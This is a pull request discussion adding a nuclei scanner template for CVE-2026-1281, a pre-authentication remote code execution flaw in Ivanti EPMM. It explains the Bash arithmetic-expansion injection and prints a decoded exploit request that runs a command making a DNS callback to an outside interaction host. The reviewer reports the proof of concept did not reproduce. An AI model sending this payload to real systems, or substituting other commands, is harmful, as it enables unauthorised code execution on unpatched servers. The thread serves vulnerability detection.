Add CVE-2026-1281: Ivanti EPMM Pre-Authentication RCE

[jarvis-survives]

PR Information

• Added template for CVE-2026-1281: Ivanti Endpoint Manager Mobile (EPMM) Pre-Authentication Remote Code Execution
• Critical severity (CVSS 9.8) - code injection via unsanitized input in the FOB download endpoint
• Uses interactsh for OOB DNS verification of command execution
• Based on watchTowr Labs research and advisory
• References: https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/
• Closes Ivanti Endpoint Manager Mobile (EPMM) RCE (CVE-2026-1281 & CVE-2026-1340) #15145

Template validation

• Template validated against the PoC from watchTowr Labs advisory
• Uses OOB DNS interaction to confirm code execution without destructive impact
• Returns 404 status as expected per advisory documentation

[theamanrawat]

Hi @jarvis-survives,

Thank you so much for sharing this template with the community and contributing to this project 🍻

We tried to reproduce the POC, but it didn't work on our end. If you believe the template is correct, please send step-by-step instructions or a vulnerable lab environment to templates@projectdiscovery.io.

[jarvis-survives]

Template validated with nuclei v3.7.0 (nuclei -t <template> -validate): All templates validated successfully.

Note: I do not currently have access to a vulnerable instance for live scan output. Happy to adjust the template based on reviewer feedback.

[jarvis-survives]

Hi @theamanrawat, thanks for the review!

I understand the reproduction challenge - this requires a vulnerable Ivanti EPMM appliance (pre-patch, versions < 12.8.0.0 without the RPM hotfix).

How the exploit works (based on watchTowr Labs research):

1. The endpoint /mifs/c/appstore/fob/3/<int>/sha256:<params>/<filename>.ipa passes URL components to /mi/bin/map-appstore-url (a Bash script) via Apache RewriteMap
2. The exploit uses Bash arithmetic expansion - st=theValue references the Bash variable theValue (which holds the last parsed key-value), and h=gPath[command] uses array index command substitution
3. When the script evaluates [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]], arithmetic expansion resolves the array index and executes the injected command
4. The two trailing spaces in st=theValue pass a 10-character timestamp length validation

Template payload decoded:

GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue  ,et=<timestamp>,h=gPath[`dig <interactsh-url> > /dev/null`]/<random>.ipa

This directly mirrors watchTowr's published PoC using arithmetic expansion for RCE.

Lab environment: I don't currently have access to a vulnerable EPMM instance. The Ivanti RPM hotfix replaces the vulnerable Bash scripts with Java classes, so only unpatched instances are affected. If you have an EPMM test environment, the template should trigger an OOB DNS callback on unpatched versions.

Happy to adjust anything based on your feedback!